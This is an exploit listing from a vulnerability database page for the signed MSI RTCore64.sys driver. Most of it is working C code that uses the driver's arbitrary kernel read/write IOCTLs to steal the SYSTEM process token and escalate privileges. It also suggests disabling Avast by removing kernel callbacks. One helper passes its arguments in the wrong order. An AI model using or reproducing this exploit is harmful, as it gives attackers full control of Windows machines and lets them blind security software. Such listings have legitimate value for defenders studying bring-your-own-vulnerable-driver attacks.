MSI RTCore64.sys Privilege escalation

2024.10.07
Credit: NSA
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-269


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

// RTCore64.sys allows arbitrary read/write, driver has a valid certificate. // [ / ]: You can use this driver to make 'Avast' completely useless by removing the kernel callback. /* Before all, there is an important thing to note: there are some offsets, but these offsets may vary with different Windows winver versions: '0x448 = ActiveProcessLinks', '0x4B8 = Token', '0x440 = UniqueProcessId' /* --- RTCORE64.H --- */ typedef struct _RTCORE64_READ_MEMORY { BYTE pad0[ 8 ]; DWORD64 address; BYTE pad1[ 8 ]; DWORD readsize; DWORD value; BYTE pad2[ 16 ]; } RTCORE64_READ_MEMORY; typedef struct _RTCORE64_WRITE_MEMORY { BYTE pad0[ 8 ]; DWORD64 address; BYTE pad1[ 8 ]; DWORD readsize; DWORD value; BYTE pad2[ 16 ]; } RTCORE64_WRITE_MEMORY; DWORD ReadMemoryPrimitive( HANDLE hDevice, DWORD64 address, DWORD size ) { RTCORE64_READ_MEMORY read_memory = { 0 }; read_memory.address = address; read_memory.readsize = size; DWORD bytes = 0; // 0x80002048 = RTCORE64_READ_MEMORY_IOCTL // DeviceIoControl( hDevice, 0x80002048, &read_memory, sizeof( read_memory ), &read_memory, sizeof( read_memory ), &bytes, NULL ); return read_memory.value; } DWORD64 ReadMemoryDWORD64( HANDLE hDevice, DWORD64 address ) { return ( DWORD64 ) ReadMemoryPrimitive( hDevice, 4, address + 4 ) << 32 | ReadMemoryPrimitive( hDevice, 4, address ); } void WriteMemoryPrimitive( HANDLE hDevice, DWORD64 address, DWORD size, DWORD value ) { RTCORE64_WRITE_MEMORY write_memory = { 0 }; write_memory.address = address; write_memory.readsize = size; write_memory.value = value; DWORD bytes = 0; // 0x8000204C = RTCORE64_WRITE_MEMORY_IOCTL // DeviceIoControl( hDevice, 0x8000204C, &write_memory, sizeof( write_memory ), &write_memory, sizeof( write_memory ), &bytes, NULL ); } void WriteMemoryDWORD64( HANDLE hDevice, DWORD64 address, DWORD64 value ) { WriteMemoryPrimitive( hDevice, 4, address, value & 0xFFFFFFFF ); WriteMemoryPrimitive( hDevice, 4, address + 4, value >> 32 ); } /* --- MAIN.C --- */ void NT_AUTHORITY_SYSTEM( void ) { HANDLE hDevice = CreateFileA( "\\\\.\\RTCore64", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL ); if ( hDevice == INVALID_HANDLE_VALUE || hDevice == NULL ) exit( 0 ); HMODULE ntoskrnl = LoadLibraryA( "ntoskrnl.exe" ); if ( ntoskrnl == NULL ) { CloseHandle( hDevice ); exit( 0 ); } DWORD64 PsInitialSystemProcessOffset = ( DWORD64 ) GetProcAddress( ntoskrnl, "PsInitialSystemProcess" ) - ( DWORD64 ) ntoskrnl; DWORD64 PsInitialSystemProcessAddress = ReadMemoryDWORD64( hDevice, GetNtoskrnlBaseAddress() + PsInitialSystemProcessOffset ); DWORD currentProcesID = GetCurrentProcessId(); DWORD64 currentProcessAddress = PsInitialSystemProcessAddress + 0x448; DWORD64 systemProcessToken = ReadMemoryDWORD64( hDevice, PsInitialSystemProcessAddress + 0x4B8 ) & ~15; do { DWORD64 processAddress = currentProcessAddress - 0x448; DWORD64 UniqueProcessId = ReadMemoryDWORD64( hDevice, processAddress + 0x440 ); if ( UniqueProcessId == ( DWORD64 ) ( currentProcesID ) ) break; currentProcessAddress = ReadMemoryDWORD64( hDevice, processAddress + 0x448 ); } while ( currentProcessAddress != PsInitialSystemProcessAddress + 0x448 ); currentProcessAddress -= 0x448; DWORD64 CurrentProcessTokenReferenceCounter = ReadMemoryDWORD64( hDevice, currentProcessAddress + 0x4B8 ) & 15; WriteMemoryDWORD64( hDevice, currentProcessAddress + 0x4B8, CurrentProcessTokenReferenceCounter | systemProcessToken ); CloseHandle( hDevice ); FreeLibrary( ntoskrnl ); }

References:

Privilege escalation:
https://github.com/Offensive-Panda/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE
[ / ]: Avast kernel callback remove:
https://medium.com/@VL1729_JustAT3ch/removing-process-creation-kernel-callbacks-c5636f5c849f


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top